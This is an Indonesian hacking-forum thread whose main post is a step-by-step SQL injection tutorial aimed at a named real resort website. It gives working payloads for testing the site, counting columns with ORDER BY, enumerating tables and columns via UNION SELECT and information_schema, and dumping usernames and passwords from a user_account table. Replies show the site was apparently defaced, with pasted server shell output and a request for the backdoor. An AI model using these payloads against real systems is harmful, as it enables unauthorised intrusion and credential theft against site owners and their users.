[Tutor] SQL Injection For Newbie (Share Di Mari)

[cangcimen]

selamat sore teman-teman DC

ane mau ngelanjutin thread ane yng tadi subuh udah di close sama admin DC karena menyimpang dari rule DC
sebelumnya ane minta maaf ya tentang thread ane yang itu

okeh di mulai aja dah
ane bikin thread kali ini buat para calon-calon hacker muda yang baru tau dan pengen mendalami tentang SQl injection ( gaya banget ya ane) , untuk para dewa (dewa19 kaleee ) ngga usah liat juga gpp, tapi alangkah baiknya bisa menasehati dan menyarankan untuk daun muda (kaya ane).

sebenernya udah ada thread yang kaya begini, tapi ane mencoba merefresh aja lagi, semoga diijin kan sama om dewa-dewa (amiinnn)

RULE:
1. Harus pake gambar untuk memberikan tutorial(biar para daun muda bisa belajar ) kalo bertanya bebas
2. Harus jelas dalam bertanya dan memberikan tutorial
3. Kalo post itu memang bermanfaat buat kalian yg pembaca alangkah baiknya di berikan cendol

kalo beitu langsung aja deh, sekarang ane duluan

Code:

target : www.canseburesort.co.id

dari alamt website ini terdapat celah Sqli,

Code:

www.canseburesort.co.id/?id_page=6&id_berita=15

Spoiler:

seperti biasa untuk mengecek apa itu vuln terhadap SQLI kita uji coba pake single quote '

Code:

www.canseburesort.co.id/?id_page=6&id_berita=15'

Spoiler:

yoman ternyata ini benar ada pesan error itu..
di lanjut kalo gitu, untuk mengecek berapa jumpaj kolom kita menggunakan order by

Code:

id_berita=-15 order by 1--
id_berita=-15 order by 2--
id_berita=-15 order by 3--
id_berita=-15 order by 4--
|
|sampai
|
id_berita=-15 order by 9--

berikut gambar ketika menggunakan

Code:

id_berita=-15 order by 1--

Spoiler:

dan ini ketika kita menggunakan

Code:

id_berita=-15 order by 9--

[spoiler]

okeh sekarang kita udah dapet jumlah kolomnya, jumlah kolom = 8 karena pas kita lagi cek di order by 9 keluar error itu berarti jumlah kolomnya ada 8 tapi kalo sewaktu-waktu kita menggunakan order by 9 (n) berarti jumlah kolomnya di kurang satu, ini untuk contoh kasus yang kaya ane ya, karena ngga semua sama tergantung dari pesan error yang di keluarin (sok tau banget )

lanjut...
setelah kita dapet jumlah kolom kita menggunakan perintah union untuk mendapat kan the magic number

Code:

id_berita=-15 union all select 1,2,3,4,5,6,7,8--
angka-angka itu tergantung jumlah kolom ya

Spoiler:

the magic numbers = 3,4,5
dari angka itu kita bakalan dapet informasi sepert:
versi : version()
user : user()
database : database()
nama tabel : table_name
nama kolom : column_name
dll

okeh di lanjut ya, sekarang kita pengen tau versi berapa dan apa nama databasenya

Code:

id_berita=-15 union all select 1,2,3,4,group_concat(version(),database()),6,7,8--
ane pake magic number 5

Spoiler:

lanjut lagi kita pengen tau ada tabel apa aja ya

Code:

id_berita=-15 union all select 1,2,3,4,group_concat(table_name),6,7,8 from information_schema.tables where table_schema=database()--
ane pake magic number 5

Spoiler:

kita dapetin tuh nama tablenya:

Quote:additional_menu,
adm_page,
ads_banner,
amazing_camp,
artikel,
banner,
client_category,
client_image,
galery,
galery_category,
lib_news,
lib_page,
lib_promo,
menu_child,
nav_menu,
news,
price_room,
promotion,
room_galery,
user_account

ini dia yg kita cari-cari dari nama-nama tabel di atas ane pilih yang user_account karena kelihatannya menyimpan akses buat login (mudah-mudahan bisa )

sebelum kita mendapatkan nama kolom kita harus mengganti nama tabel user_account dalam bentuk hex :

Code:

user_account = 0x757365725f6163636f756e74

maka jadi seperti ini

Code:

id_berita=-15 union all select 1,2,3,4,group_concat(column_name),6,7,8 from information_schema.columns where table_name= 0x757365725f6163636f756e74--
ane pake magic number 5

Spoiler:

dapet juga tuh, sekarang kita liat password sama usernamenya

Code:

id_berita=-15 union all select 1,2,3,4,group_concat(username,0x3a,password),6,7,8 from user_account--
ane pake magic number 5

Spoiler:

akhirnya kita udah dapet itu username sma passwordnya
kalo beruntung kita bisa decrypt itu username sama password tapi kalo ngga bisa ya pasrah
demikian penjelasan dari ane, terimakasih atas perhatiannya dan juga ane minta maaf kalo banyak kekurangan dalam memberikan tutor dan dalam hal penulisannya...

semoga membantu para daun muda DC (amin)
di tunggu hasil kreasi kalian semuanya..
jangan lupa di cendolin yak...

----Terima Kasih DC----

[ohara_inamiji]

sedikit saran dari ane...

kalo mau nyoba sqli pastiin dulu ada halaman admin nya...
karena walau di inject gak ketemu halaman admin nya bisa bikin frustasi...

[rusuh]

nice share bang
tapi kalau ane pribadi pentest ke website luar aja bang sebagai contoh

[cangcimen]

(12-29-2011 06:34 PM)ohara_inamiji Wrote:  sedikit saran dari ane...

kalo mau nyoba sqli pastiin dulu ada halaman admin nya...
karena walau di inject gak ketemu halaman admin nya bisa bikin frustasi...

namanya juga ngga sengaja lewat, terus nemu deh,
tengkyu sarannya...

---

(12-29-2011 06:38 PM)rusuh Wrote:  nice share bang
tapi kalau ane pribadi pentest ke website luar aja bang sebagai contoh

iye om,, ane ngga sengaja juga sih ane kan bukan heker

[xil0n9]

ngono iku lo yo opo seh carane ?

[rusuh]

http://www.zone-h.org/archive/ip=116.90.165.138
habis
pantang dapet sela langsung kena symlink

Quote:OS : Linux indo7.liveserver.info 2.6.18-238.el5 #1 SMP Thu Jan 13 15:51:15 EST 2011 x86_64
User ID : uid=673(cansebur) gid=671(cansebur) groups=671(cansebur)
Server IP : 116.90.165.138 - Your IP : 203.211.134.185
Freespace : 278.1 GB of 376.35 GB (73.89%)

[CyberKaze]

mantep omz.. ane ngati ampe situ caraya

[schumbag]

keren ane minta backdoor nya ajah lah

[cangcimen]

(12-29-2011 07:40 PM)rusuh Wrote:  http://www.zone-h.org/archive/ip=116.90.165.138
habis
pantang dapet sela langsung kena symlink

Quote:OS : Linux indo7.liveserver.info 2.6.18-238.el5 #1 SMP Thu Jan 13 15:51:15 EST 2011 x86_64
User ID : uid=673(cansebur) gid=671(cansebur) groups=671(cansebur)
Server IP : 116.90.165.138 - Your IP : 203.211.134.185
Freespace : 278.1 GB of 376.35 GB (73.89%)

mantap om..

[eidelweiss]

(12-29-2011 06:27 PM)cangcimen Wrote:  selamat sore teman-teman DC

ane mau ngelanjutin thread ane yng tadi subuh udah di close sama admin DC karena menyimpang dari rule DC
sebelumnya ane minta maaf ya tentang thread ane yang itu

okeh di mulai aja dah
ane bikin thread kali ini buat para calon-calon hacker muda yang baru tau dan pengen mendalami tentang SQl injection ( gaya banget ya ane) , untuk para dewa (dewa19 kaleee ) ngga usah liat juga gpp, tapi alangkah baiknya bisa menasehati dan menyarankan untuk daun muda (kaya ane).

sebenernya udah ada thread yang kaya begini, tapi ane mencoba merefresh aja lagi, semoga diijin kan sama om dewa-dewa (amiinnn)

RULE:
1. Harus pake gambar untuk memberikan tutorial(biar para daun muda bisa belajar ) kalo bertanya bebas
2. Harus jelas dalam bertanya dan memberikan tutorial
3. Kalo post itu memang bermanfaat buat kalian yg pembaca alangkah baiknya di berikan cendol

kalo beitu langsung aja deh, sekarang ane duluan

Code:

target : www.canseburesort.co.id

dari alamt website ini terdapat celah Sqli,

Code:

www.canseburesort.co.id/?id_page=6&id_berita=15

Spoiler:

seperti biasa untuk mengecek apa itu vuln terhadap SQLI kita uji coba pake single quote '

Code:

www.canseburesort.co.id/?id_page=6&id_berita=15'

Spoiler:

yoman ternyata ini benar ada pesan error itu..
di lanjut kalo gitu, untuk mengecek berapa jumpaj kolom kita menggunakan order by

Code:

id_berita=-15 order by 1--
id_berita=-15 order by 2--
id_berita=-15 order by 3--
id_berita=-15 order by 4--
|
|sampai
|
id_berita=-15 order by 9--

berikut gambar ketika menggunakan

Code:

id_berita=-15 order by 1--

Spoiler:

dan ini ketika kita menggunakan

Code:

id_berita=-15 order by 9--

[spoiler]

okeh sekarang kita udah dapet jumlah kolomnya, jumlah kolom = 8 karena pas kita lagi cek di order by 9 keluar error itu berarti jumlah kolomnya ada 8 tapi kalo sewaktu-waktu kita menggunakan order by 9 (n) berarti jumlah kolomnya di kurang satu, ini untuk contoh kasus yang kaya ane ya, karena ngga semua sama tergantung dari pesan error yang di keluarin (sok tau banget )

lanjut...
setelah kita dapet jumlah kolom kita menggunakan perintah union untuk mendapat kan the magic number

Code:

id_berita=-15 union all select 1,2,3,4,5,6,7,8--
angka-angka itu tergantung jumlah kolom ya

Spoiler:

the magic numbers = 3,4,5
dari angka itu kita bakalan dapet informasi sepert:
versi : version()
user : user()
database : database()
nama tabel : table_name
nama kolom : column_name
dll

okeh di lanjut ya, sekarang kita pengen tau versi berapa dan apa nama databasenya

Code:

id_berita=-15 union all select 1,2,3,4,group_concat(version(),database()),6,7,8--
ane pake magic number 5

Spoiler:

lanjut lagi kita pengen tau ada tabel apa aja ya

Code:

id_berita=-15 union all select 1,2,3,4,group_concat(table_name),6,7,8 from information_schema.tables where table_schema=database()--
ane pake magic number 5

Spoiler:

kita dapetin tuh nama tablenya:

Quote:additional_menu,
adm_page,
ads_banner,
amazing_camp,
artikel,
banner,
client_category,
client_image,
galery,
galery_category,
lib_news,
lib_page,
lib_promo,
menu_child,
nav_menu,
news,
price_room,
promotion,
room_galery,
user_account

ini dia yg kita cari-cari dari nama-nama tabel di atas ane pilih yang user_account karena kelihatannya menyimpan akses buat login (mudah-mudahan bisa )

sebelum kita mendapatkan nama kolom kita harus mengganti nama tabel user_account dalam bentuk hex :

Code:

user_account = 0x757365725f6163636f756e74

maka jadi seperti ini

Code:

id_berita=-15 union all select 1,2,3,4,group_concat(column_name),6,7,8 from information_schema.columns where table_name= 0x757365725f6163636f756e74--
ane pake magic number 5

Spoiler:

dapet juga tuh, sekarang kita liat password sama usernamenya

Code:

id_berita=-15 union all select 1,2,3,4,group_concat(username,0x3a,password),6,7,8 from user_account--
ane pake magic number 5

Spoiler:

akhirnya kita udah dapet itu username sma passwordnya
kalo beruntung kita bisa decrypt itu username sama password tapi kalo ngga bisa ya pasrah
demikian penjelasan dari ane, terimakasih atas perhatiannya dan juga ane minta maaf kalo banyak kekurangan dalam memberikan tutor dan dalam hal penulisannya...

semoga membantu para daun muda DC (amin)
di tunggu hasil kreasi kalian semuanya..
jangan lupa di cendolin yak...

----Terima Kasih DC----

om bisa di jelasin nggak pada bagian ini

Quote:sebelum kita mendapatkan nama kolom kita harus mengganti nama tabel user_account dalam bentuk hex :

Code:

user_account = 0x757365725f6163636f756e74

kenapa harus di ubah or di hex terlebih dahulu ? kenapa gk lgsg aja atau klw pun harus di encrpyt kenapa harus dalam bentuk hexa kenapa nggak md5 base64 r00t13 or sha-1 or yg lain ?